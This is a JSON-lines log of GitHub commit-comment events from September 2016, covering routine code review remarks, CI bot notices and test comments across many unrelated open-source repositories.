{"id":"4512911416","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18891592,"position":null,"line":null,"path":null,"commit_id":"d1d5fe54f3e0c9152ff77fb8f7ddbc5293f63519","created_at":"2016-09-03T23:27:49Z","updated_at":"2016-09-03T23:27:49Z","body":"Should be able to just disable input if shift is pressed in the lobby, the function will be nil but we can still just put the code in the onKeyDown entry. I didn't even check if cheats were enabled before a mission loads, I was hoping it wouldnt be so difficult to block the cheats..."}},"created_at":"2016-09-03T23:27:49Z"}
{"id":"4512914446","type":"CommitCommentEvent","actor":{"login":"AndreasBackx"},"repo":{"name":"jrief/django-sass-processor"},"payload":{"comment":{"id":18891597,"position":19,"line":19,"path":"sass_processor/apps.py","commit_id":"0c1e4462ed39cf523b57312e562bd4fed12c8254","created_at":"2016-09-03T23:31:20Z","updated_at":"2016-09-03T23:31:20Z","body":"django.contrib.staticfiles.finders.FileSystemFinder checks a list of directories on top of per app `static/` folders. It should be added too.\r\n\r\n[See STATICFILES_FINDERS documentation.](https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-STATICFILES_FINDERS)"}},"created_at":"2016-09-03T23:31:20Z"}
{"id":"4512915564","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18891603,"position":null,"line":null,"path":null,"commit_id":"b40e0fab23f46632b004ff9bece7fe9fef29ef9b","created_at":"2016-09-03T23:32:36Z","updated_at":"2016-09-03T23:32:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;B1WnUqRq&#x2F;36-show-payment-details-in-welcome-email\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Show payment details in welcome email</a>"}},"created_at":"2016-09-03T23:32:36Z"}
{"id":"4512915763","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18891607,"position":null,"line":null,"path":null,"commit_id":"4a56ea4c3025e8baded2074a76f5a9e246935c9b","created_at":"2016-09-03T23:32:48Z","updated_at":"2016-09-03T23:32:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;U0pKYlfG&#x2F;31-registration-welcome-emails-are-not-sent-when-paying-by-paypal\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Registration welcome emails are not sent when paying by PayPal</a>"}},"created_at":"2016-09-03T23:32:48Z"}
{"id":"4512916898","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18891608,"position":null,"line":null,"path":null,"commit_id":"d10e764cd12e75d19a4f1a2f6f5d6bbebea6df88","created_at":"2016-09-03T23:34:02Z","updated_at":"2016-09-03T23:34:02Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Ut7M4a_vSLu_E9KWiNvxuQ"}},"created_at":"2016-09-03T23:34:02Z"}
{"id":"4512918362","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18891609,"position":null,"line":null,"path":null,"commit_id":"e787c6e70b89269a096392349084ced5a5b8ff35","created_at":"2016-09-03T23:35:30Z","updated_at":"2016-09-03T23:35:30Z","body":"Ok, thanks. First commit was missing. Seems fine now."}},"created_at":"2016-09-03T23:35:30Z"}
{"id":"4512920282","type":"CommitCommentEvent","actor":{"login":"coatless"},"repo":{"name":"SMAC-Group/TTS"},"payload":{"comment":{"id":18891613,"position":3,"line":3,"path":"code/chapter/02_stationarity_autocorrelation.R","commit_id":"405e8448964cba0c4b9ea27db8b52f13a360e2ac","created_at":"2016-09-03T23:37:42Z","updated_at":"2016-09-03T23:37:42Z","body":"Need to add `quantmod` as a dependency. Otherwise, the package is _not_ installed. \r\n\r\nFixed in: 6e422f895d247f33e0ed8c11c685d17dcbd6183c"}},"created_at":"2016-09-03T23:37:42Z"}
{"id":"4512922353","type":"CommitCommentEvent","actor":{"login":"Freeloader-Zero"},"repo":{"name":"charrednewth/Succubus-Rhapsodia-ENG"},"payload":{"comment":{"id":18891618,"position":null,"line":null,"path":null,"commit_id":"09885fd50f909ea1d0aacfff19502599dc55d0c1","created_at":"2016-09-03T23:40:02Z","updated_at":"2016-09-03T23:40:02Z","body":"Heya Strange! Awesome work you've got here!\r\n\r\nBTW - I sent you a PM via ULMF. If you have time, please consider reading it. Thanks!\r\n\r\n(If I don't reply right away, I'm probably asleep (been up all night/day; guessing the same for you too, lol))"}},"created_at":"2016-09-03T23:40:02Z"}
{"id":"4512925964","type":"CommitCommentEvent","actor":{"login":"wb3fan"},"repo":{"name":"xbgmsharp/piwigo-openstreetmap"},"payload":{"comment":{"id":18891620,"position":null,"line":null,"path":null,"commit_id":"096548e0b1739668880928322ccae1f5245497cf","created_at":"2016-09-03T23:44:17Z","updated_at":"2016-09-03T23:44:17Z","body":"I'm not a PHP guy (_yet,_ working on it though!), but I'm getting\r\n`PHP Parse error:  syntax error, unexpected '[' from new line 145`\r\nthat appears to have been added in this commit of admin/admin_photo.php. Any thoughts @xbgmsharp?"}},"created_at":"2016-09-03T23:44:17Z"}
{"id":"4512934482","type":"CommitCommentEvent","actor":{"login":"rluble"},"repo":{"name":"gwtproject/gwt"},"payload":{"comment":{"id":18891630,"position":10,"line":164,"path":"user/super/com/google/gwt/emul/java/lang/String.java","commit_id":"468036ade51cd5094403ed2fb206e204c4f08fd3","created_at":"2016-09-03T23:53:53Z","updated_at":"2016-09-03T23:53:53Z","body":"@ruslansennov, does that only happen in SDM? It seems quite strange since qualified names (dotted names) are allowed for native members explicitly (see https://gwt.googlesource.com/gwt/+/master/dev/core/src/com/google/gwt/dev/jjs/impl/JsInteropRestrictionChecker.java#570). Could you upload a small example with repro instructions."}},"created_at":"2016-09-03T23:53:53Z"}
{"id":"4512936593","type":"CommitCommentEvent","actor":{"login":"xx254"},"repo":{"name":"HaoNiuBi/LeetCodeQuestions"},"payload":{"comment":{"id":18891631,"position":null,"line":null,"path":null,"commit_id":"12881a9a250a627b8187276f6966b21e4fa1e3e2","created_at":"2016-09-03T23:56:33Z","updated_at":"2016-09-03T23:56:33Z","body":"== 94. Binary Tree Inorder Traversal"}},"created_at":"2016-09-03T23:56:33Z"}
{"id":"4511505088","type":"CommitCommentEvent","actor":{"login":"bbockelm"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888615,"position":38,"line":83,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:01:12Z","updated_at":"2016-09-03T03:01:12Z","body":"Yeah - I was planning to refactor these arrays out to a private sub-class. That will help with the namings here (and avoid having the combination of three member variables all with a \"special relationship\"."}},"created_at":"2016-09-03T03:01:12Z"}
{"id":"4511505311","type":"CommitCommentEvent","actor":{"login":"EionRobb"},"repo":{"name":"EionRobb/funyahoo-plusplus"},"payload":{"comment":{"id":18888616,"position":null,"line":null,"path":null,"commit_id":"fe2a944f50ddf6b88618439d8b62d7c3b60669f2","created_at":"2016-09-03T03:01:24Z","updated_at":"2016-09-03T03:01:24Z","body":"If we're not storeing the last timestamp, how does it stop duplicated messages? "}},"created_at":"2016-09-03T03:01:24Z"}
{"id":"4511506435","type":"CommitCommentEvent","actor":{"login":"bbockelm"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888617,"position":33,"line":78,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:02:18Z","updated_at":"2016-09-03T03:02:18Z","body":"Are the semantics similar enough?  Seems strange to replace a C++ standard class with a less standard one."}},"created_at":"2016-09-03T03:02:18Z"}
{"id":"4511507139","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18888618,"position":null,"line":null,"path":null,"commit_id":"0e60839daf25ae6364424e0a3a1aa8dea9f8a39c","created_at":"2016-09-03T03:02:54Z","updated_at":"2016-09-03T03:02:54Z","body":"Related to: backdrop/backdrop-issues#2123 "}},"created_at":"2016-09-03T03:02:54Z"}
{"id":"4511508387","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18888619,"position":null,"line":null,"path":null,"commit_id":"c0e5af4154d12ff3dd3547c634bd8aa773510dc0","created_at":"2016-09-03T03:04:03Z","updated_at":"2016-09-03T03:04:03Z","body":"Related to: backdrop/backdrop-issues#2123 "}},"created_at":"2016-09-03T03:04:03Z"}
{"id":"4511508680","type":"CommitCommentEvent","actor":{"login":"bbockelm"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888620,"position":135,"line":733,"path":"tree/tree/src/TTreeCache.cxx","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:04:18Z","updated_at":"2016-09-03T03:04:18Z","body":"Just habit, I suppose.  Is there a particular disadvantage?"}},"created_at":"2016-09-03T03:04:18Z"}
{"id":"4511508802","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/android_packages_apps_SetupWizard"},"payload":{"comment":{"id":18888621,"position":null,"line":null,"path":null,"commit_id":"e2d866509ae090a6fced84472fabf90f28058898","created_at":"2016-09-03T03:04:24Z","updated_at":"2016-09-03T03:04:24Z","body":"This fixes not updating the UI when a broadcast is received with the screen off and the activity+fragment paused. Tested!"}},"created_at":"2016-09-03T03:04:24Z"}
{"id":"4511509733","type":"CommitCommentEvent","actor":{"login":"pcanal"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888622,"position":33,"line":78,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:05:13Z","updated_at":"2016-09-03T03:05:13Z","body":"The semantic are very similar ... more important it is already used for the same/similar purpose in this class, so for \"consistency's sake\" ...."}},"created_at":"2016-09-03T03:05:13Z"}
{"id":"4511509988","type":"CommitCommentEvent","actor":{"login":"usrJun89"},"repo":{"name":"usrJun89/first"},"payload":{"comment":{"id":18888624,"position":2,"line":2,"path":"lianxi.c","commit_id":"0914aa515e845b7553ae7fffa7100d3d944e6b53","created_at":"2016-09-03T03:05:28Z","updated_at":"2016-09-03T03:05:28Z","body":"//dasdsa"}},"created_at":"2016-09-03T03:05:28Z"}
{"id":"4511510676","type":"CommitCommentEvent","actor":{"login":"bbockelm"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888625,"position":33,"line":78,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:06:05Z","updated_at":"2016-09-03T03:06:05Z","body":"Sounds good; I'll roll in a fix."}},"created_at":"2016-09-03T03:06:05Z"}
{"id":"4511511708","type":"CommitCommentEvent","actor":{"login":"Meziden"},"repo":{"name":"Meziden/uestc-glasgow-2227360"},"payload":{"comment":{"id":18888631,"position":null,"line":null,"path":null,"commit_id":"768e22f861f54264cfa152ffd32a5f5ed49c5f4a","created_at":"2016-09-03T03:07:01Z","updated_at":"2016-09-03T03:07:01Z","body":"Testing comments."}},"created_at":"2016-09-03T03:07:01Z"}
{"id":"4511511758","type":"CommitCommentEvent","actor":{"login":"pcanal"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888632,"position":135,"line":733,"path":"tree/tree/src/TTreeCache.cxx","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:07:05Z","updated_at":"2016-09-03T03:07:05Z","body":"Well in this case it is 'useless' set of characters :)"}},"created_at":"2016-09-03T03:07:05Z"}
{"id":"4511512091","type":"CommitCommentEvent","actor":{"login":"jimmyzhen"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18888633,"position":14,"line":562,"path":"src/clincoded/static/components/variant_central/interpretation/computational.js","commit_id":"4522a18f16836a6fe262c21b0d2acc94d21490e1","created_at":"2016-09-03T03:07:25Z","updated_at":"2016-09-03T03:07:25Z","body":"@kilodalton @mrmin123 @kgliu0101 \r\n\r\nNot sure whether you came across this behavior in the past. I noticed that the single apostrophe in JSX would cause erroneous syntax highlighting. There was indication of it in Sublime Text or vim, but I caught it on Github (e.g. https://github.com/ClinGen/clincoded/blob/dev/src/clincoded/static/components/variant_central/interpretation/computational.js#L562) as well as in Atom editor.\r\n\r\nIf there is a better way to handle such matter, please feel free to let me know."}},"created_at":"2016-09-03T03:07:25Z"}
{"id":"4511512434","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":18888634,"position":37,"line":73,"path":"js/RateCurve.js","commit_id":"c3d5f1dd56aeb9acff13b3aee449ea6b2d24df93","created_at":"2016-09-03T03:07:44Z","updated_at":"2016-09-03T03:07:44Z","body":"Fixed."}},"created_at":"2016-09-03T03:07:44Z"}
{"id":"4511514043","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":18888635,"position":null,"line":null,"path":null,"commit_id":"c3d5f1dd56aeb9acff13b3aee449ea6b2d24df93","created_at":"2016-09-03T03:09:07Z","updated_at":"2016-09-03T03:09:07Z","body":"Looks good to me. You know way better than me how the rates calculation is done on the FC, @borisbstyle.\r\n\r\nI have added support for RC Expo Power in #252."}},"created_at":"2016-09-03T03:09:07Z"}
{"id":"4511514699","type":"CommitCommentEvent","actor":{"login":"ryukinix"},"repo":{"name":"sobral-developers-group/coding-dojo"},"payload":{"comment":{"id":18888636,"position":1,"line":1,"path":"2016.2/fizzbuzz/fizzbuzz.py","commit_id":"59253cc99464af44ad03e37b9b4aeac1084f4fdd","created_at":"2016-09-03T03:09:42Z","updated_at":"2016-09-03T03:09:42Z","body":"De acordo com a [PEP-8](https://www.python.org/dev/peps/pep-0008/), é aconselhável que funções e métodos usem `underscore lower case`. Como `fizz_buzz` e `fizz_buzz_all`."}},"created_at":"2016-09-03T03:09:42Z"}
{"id":"4511517131","type":"CommitCommentEvent","actor":{"login":"MouniPorandla"},"repo":{"name":"MouniPorandla/Readme"},"payload":{"comment":{"id":18888637,"position":null,"line":null,"path":null,"commit_id":"78d1dab58873d772b9366eb9e637b2e2e86b5194","created_at":"2016-09-03T03:11:56Z","updated_at":"2016-09-03T03:11:56Z","body":"sample testing..."}},"created_at":"2016-09-03T03:11:56Z"}
{"id":"4511520691","type":"CommitCommentEvent","actor":{"login":"digama0"},"repo":{"name":"metamath/set.mm"},"payload":{"comment":{"id":18888642,"position":null,"line":null,"path":null,"commit_id":"e06049900d795f8b5a0dad481345b6f4d523c0f2","created_at":"2016-09-03T03:15:10Z","updated_at":"2016-09-03T03:15:10Z","body":"This is a shortcoming of `metamath.exe`'s rewrap command, I'm sure (which prefers to double-space between sentences). Chances are these will be reverted in the next official release."}},"created_at":"2016-09-03T03:15:10Z"}
{"id":"4511520937","type":"CommitCommentEvent","actor":{"login":"marb99"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18888643,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-03T03:15:24Z","updated_at":"2016-09-03T03:15:24Z","body":"@ivandrofly \r\n\r\nthe message is the same as above and I use two different subtitle"}},"created_at":"2016-09-03T03:15:24Z"}
{"id":"4511523061","type":"CommitCommentEvent","actor":{"login":"FJackZhou"},"repo":{"name":"SW-Team/PureEntities"},"payload":{"comment":{"id":18888645,"position":null,"line":null,"path":null,"commit_id":"34a479ae0b2dad7ea01f4c1b2871ccd5230a83c9","created_at":"2016-09-03T03:17:31Z","updated_at":"2016-09-03T03:17:31Z","body":"nice!"}},"created_at":"2016-09-03T03:17:31Z"}
{"id":"4511524339","type":"CommitCommentEvent","actor":{"login":"xiongtx"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18888646,"position":null,"line":null,"path":null,"commit_id":"f2768d92ee712ec065d22423798dbbd8137f36cd","created_at":"2016-09-03T03:18:50Z","updated_at":"2016-09-03T03:18:50Z","body":"## Suggestion\r\nWhen making a change to the public interface (in this case, removing `helm-force-updating-p`), [update the major version number](http://semver.org/). "}},"created_at":"2016-09-03T03:18:50Z"}
{"id":"4511526703","type":"CommitCommentEvent","actor":{"login":"MarianoNavedo"},"repo":{"name":"gonzalorodrigo/osxcalendarwidget"},"payload":{"comment":{"id":18888649,"position":null,"line":null,"path":null,"commit_id":"e44cd39dd782105e01f312b704ab87da8c782dfe","created_at":"2016-09-03T03:20:58Z","updated_at":"2016-09-03T03:20:58Z","body":"Thanks a lot for this, widjet now works fine. :)"}},"created_at":"2016-09-03T03:20:58Z"}
{"id":"4511528734","type":"CommitCommentEvent","actor":{"login":"panjunbing"},"repo":{"name":"panjunbing/DataStructure"},"payload":{"comment":{"id":18888651,"position":null,"line":null,"path":null,"commit_id":"33974bff702ad9e28ad21e5fcdf878fe65c837a4","created_at":"2016-09-03T03:22:54Z","updated_at":"2016-09-03T03:22:54Z","body":"自己设计图并编码进行存储，同时输出图的两种遍历方式的结果。\r\n图的存储方式的选择\r\n图的遍历算法\r\n"}},"created_at":"2016-09-03T03:22:54Z"}
{"id":"4511531760","type":"CommitCommentEvent","actor":{"login":"K-Tantar"},"repo":{"name":"K-Tantar/Studying-Ocaml"},"payload":{"comment":{"id":18888661,"position":null,"line":null,"path":null,"commit_id":"efd50bff7bf8320dd92ea65616cc0b593b717093","created_at":"2016-09-03T03:25:42Z","updated_at":"2016-09-03T03:25:42Z","body":"This is first programs for question of metro networks in tokyo"}},"created_at":"2016-09-03T03:25:42Z"}
{"id":"4511532402","type":"CommitCommentEvent","actor":{"login":"bbockelm"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888664,"position":33,"line":78,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:26:16Z","updated_at":"2016-09-03T03:26:16Z","body":"Hm - is there a templated / type-safe version of `TObjArray`?  I'm a bit reluctant to lose type safety as things could get tricky."}},"created_at":"2016-09-03T03:26:16Z"}
{"id":"4511534554","type":"CommitCommentEvent","actor":{"login":"fuqiuyu"},"repo":{"name":"fuqiuyu/fuqiuyu.github.io"},"payload":{"comment":{"id":18888667,"position":null,"line":null,"path":null,"commit_id":"ffff9c469242b7c6a14ba09a30b47bfb234a76c3","created_at":"2016-09-03T03:28:19Z","updated_at":"2016-09-03T03:28:19Z","body":"hello world"}},"created_at":"2016-09-03T03:28:19Z"}
{"id":"4511534835","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888670,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-03T03:28:37Z","updated_at":"2016-09-03T03:28:37Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-12: Tests Failed (1760 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.44%25-red.svg)</a> \n"}},"created_at":"2016-09-03T03:28:37Z"}
{"id":"4511537144","type":"CommitCommentEvent","actor":{"login":"ridiculous"},"repo":{"name":"solanolabs/tddium"},"payload":{"comment":{"id":18888674,"position":null,"line":null,"path":null,"commit_id":"47134057d3aa01e531dd929c9f20a3e9b3eae9d9","created_at":"2016-09-03T03:30:45Z","updated_at":"2016-09-03T03:30:45Z","body":"Hey, It looks like you guys are in maintenance mode now, but it would be great if you could extract this out into a separate gem or just remove it? The dependency just caused a lot of headache. I'd be willing to help if interested ..."}},"created_at":"2016-09-03T03:30:45Z"}
{"id":"4511538171","type":"CommitCommentEvent","actor":{"login":"azharmohammed115"},"repo":{"name":"azharmohammed115/Hello-World-Project"},"payload":{"comment":{"id":18888675,"position":5,"line":5,"path":"Sample.java.txt","commit_id":"940aa222307ca321fe6f344dcbbfe2f18776087d","created_at":"2016-09-03T03:31:46Z","updated_at":"2016-09-03T03:31:46Z","body":"System.out.ln(\"Hello world\");"}},"created_at":"2016-09-03T03:31:46Z"}
{"id":"4511541480","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18888678,"position":null,"line":null,"path":null,"commit_id":"b2fe5c8713c3f82167c162a1aa75c9d1278fddb1","created_at":"2016-09-03T03:35:00Z","updated_at":"2016-09-03T03:35:00Z","body":"Related to: backdrop/backdrop-issues#2083 "}},"created_at":"2016-09-03T03:35:00Z"}
{"id":"4511541485","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18888679,"position":null,"line":null,"path":null,"commit_id":"fd4d1fcc0495552b0aaa76e8bf60eea843d9ed4b","created_at":"2016-09-03T03:35:01Z","updated_at":"2016-09-03T03:35:01Z","body":"Related to: backdrop/backdrop-issues#2083 "}},"created_at":"2016-09-03T03:35:01Z"}
{"id":"4511541953","type":"CommitCommentEvent","actor":{"login":"MichaelTamlyn"},"repo":{"name":"facebook/emitter"},"payload":{"comment":{"id":18888680,"position":null,"line":null,"path":null,"commit_id":"9c2828a8070de58d74aa2895cb582c32ef503121","created_at":"2016-09-03T03:35:25Z","updated_at":"2016-09-03T03:35:25Z","body":"@rosskevin, is line 12 valid syntax? = vs :\r\n\r\nIt trips up my build process."}},"created_at":"2016-09-03T03:35:25Z"}
{"id":"4511542236","type":"CommitCommentEvent","actor":{"login":"pcanal"},"repo":{"name":"bbockelm/root"},"payload":{"comment":{"id":18888683,"position":33,"line":78,"path":"tree/tree/inc/TTreeCache.h","commit_id":"9ec05ff059ce165a34f898eae2cb1f571df794ef","created_at":"2016-09-03T03:35:40Z","updated_at":"2016-09-03T03:35:40Z","body":"> is there a templated / type-safe version of TObjArray?\r\n\r\nUnfortunately no(t yet) ....\r\n\r\n> I'm a bit reluctant to lose type safety as things could get tricky.\r\n\r\nAt first, I was reluctant to introduce a new dependency on vector.   But the other use of vector are not really replaceable ... So maybe the way forward is to introduce an additional commit which change the type of fBranches to a vector ..."}},"created_at":"2016-09-03T03:35:40Z"}
{"id":"4511543352","type":"CommitCommentEvent","actor":{"login":"azharmohammed115"},"repo":{"name":"azharmohammed115/Hello-World-Project"},"payload":{"comment":{"id":18888686,"position":null,"line":null,"path":null,"commit_id":"940aa222307ca321fe6f344dcbbfe2f18776087d","created_at":"2016-09-03T03:36:47Z","updated_at":"2016-09-03T03:36:47Z","body":"added one line"}},"created_at":"2016-09-03T03:36:47Z"}
{"id":"4511543705","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18888687,"position":null,"line":null,"path":null,"commit_id":"f32a5277140a609a0b6987685c94c417fbcb25f0","created_at":"2016-09-03T03:37:09Z","updated_at":"2016-09-03T03:37:09Z","body":"Related to: backdrop/backdrop-issues#2083 "}},"created_at":"2016-09-03T03:37:09Z"}
{"id":"4511544124","type":"CommitCommentEvent","actor":{"login":"azharmohammed115"},"repo":{"name":"azharmohammed115/Hello-World-Project"},"payload":{"comment":{"id":18888688,"position":null,"line":null,"path":null,"commit_id":"940aa222307ca321fe6f344dcbbfe2f18776087d","created_at":"2016-09-03T03:37:33Z","updated_at":"2016-09-03T03:37:33Z","body":"added  line"}},"created_at":"2016-09-03T03:37:33Z"}
{"id":"4511548464","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18888691,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-03T03:41:18Z","updated_at":"2016-09-03T03:41:18Z","body":"Can you please share both files? @marb99 "}},"created_at":"2016-09-03T03:41:18Z"}
{"id":"4511548796","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888692,"position":null,"line":null,"path":null,"commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T03:41:38Z","updated_at":"2016-09-03T03:41:38Z","body":"Any entries in `replacements` with regex syntax will not match property, yielding the text \"undefined\" on the page. The affected lines are: 46 `\\\\\\\\`, 53-56 `<em>|<i>`, 62 `\\\\^`, 64 `&|%|\\\\$|#|_`, 66-67 `\\\"([^\\\"]+)\\\"` `(\\\\W)'(.+)'(?=\\\\W)`"}},"created_at":"2016-09-03T03:41:38Z"}
{"id":"4511551067","type":"CommitCommentEvent","actor":{"login":"elfleda"},"repo":{"name":"PoisonAlien/beadAnalyze"},"payload":{"comment":{"id":18888698,"position":null,"line":null,"path":null,"commit_id":"87ab3be69fabd57f51566a0efc49f8a4bb2ce14c","created_at":"2016-09-03T03:43:51Z","updated_at":"2016-09-03T03:43:51Z","body":"Thanks for sharing!"}},"created_at":"2016-09-03T03:43:51Z"}
{"id":"4511553876","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888702,"position":44,"line":58,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T03:46:35Z","updated_at":"2016-09-03T03:46:35Z","body":"Make sure all commands have arguments, even if an empty set! `\\command{}` [[1]](http://tex.stackexchange.com/questions/31091/space-after-latex-commands)"}},"created_at":"2016-09-03T03:46:35Z"}
{"id":"4511556345","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888705,"position":5,"line":63,"path":"ficbot.js","commit_id":"675e6a1d0aa671ccf0b3abb530ee7afee1c7d9cf","created_at":"2016-09-03T03:48:56Z","updated_at":"2016-09-03T03:48:56Z","body":"Yes the non-capture groups are unnecessary and this is overcomplicated, see ea8208c8ea1521fec466987d3eda76ab5e3a8f11 for the update"}},"created_at":"2016-09-03T03:48:56Z"}
{"id":"4511556474","type":"CommitCommentEvent","actor":{"login":"eandr127"},"repo":{"name":"Stealth2994/Luminescent"},"payload":{"comment":{"id":18888706,"position":null,"line":null,"path":null,"commit_id":"5e6e0aa904dba3eef87fcfbd358838d57a0a2ce3","created_at":"2016-09-03T03:49:04Z","updated_at":"2016-09-03T03:49:04Z","body":"Can you get rid of the crash logs, and are they still happening?"}},"created_at":"2016-09-03T03:49:04Z"}
{"id":"4511556973","type":"CommitCommentEvent","actor":{"login":"luoye-fe"},"repo":{"name":"luoye-fe/countdown"},"payload":{"comment":{"id":18888709,"position":null,"line":null,"path":null,"commit_id":"230a50620480b23ea16fd0056105c11ba7054e5a","created_at":"2016-09-03T03:49:31Z","updated_at":"2016-09-03T03:49:31Z","body":"#1 \r\n\r\nbeen fixed."}},"created_at":"2016-09-03T03:49:31Z"}
{"id":"4511562322","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":18888713,"position":28,"line":54,"path":"projects/GEDKeeper2/GKCore/SCCrypt.cs","commit_id":"ce2c1efed6fe2567ab148e6923d5d88deeffe89e","created_at":"2016-09-03T03:54:39Z","updated_at":"2016-09-03T03:54:39Z","body":"The following code looks (shows your intentions) more clearly...\r\n\r\n```\r\nArray.Clear(buffer, 0, buffer.Length);\r\n```\r\n\r\nthough I do not believe it is faster than your code :worried: we need some SSE here!"}},"created_at":"2016-09-03T03:54:39Z"}
{"id":"4511564130","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18888716,"position":null,"line":null,"path":null,"commit_id":"40c0fc6b958c961c961c8bad77bc0a5abc7468bd","created_at":"2016-09-03T03:56:20Z","updated_at":"2016-09-03T03:56:20Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-03T03:56:20Z"}
{"id":"4511565490","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"EionRobb/funyahoo-plusplus"},"payload":{"comment":{"id":18888718,"position":null,"line":null,"path":null,"commit_id":"fe2a944f50ddf6b88618439d8b62d7c3b60669f2","created_at":"2016-09-03T03:57:53Z","updated_at":"2016-09-03T03:57:53Z","body":"After the initial batch? It doesn't.\r\n\r\nDuring the initial batch? SyncComplete, ish. Doesn't work quite right yet because yahoo is random.\r\n\r\nBut timestamps didn't work reliably after the initai batch for the same reason, they were one of the reasons people couldn't see messages."}},"created_at":"2016-09-03T03:57:53Z"}
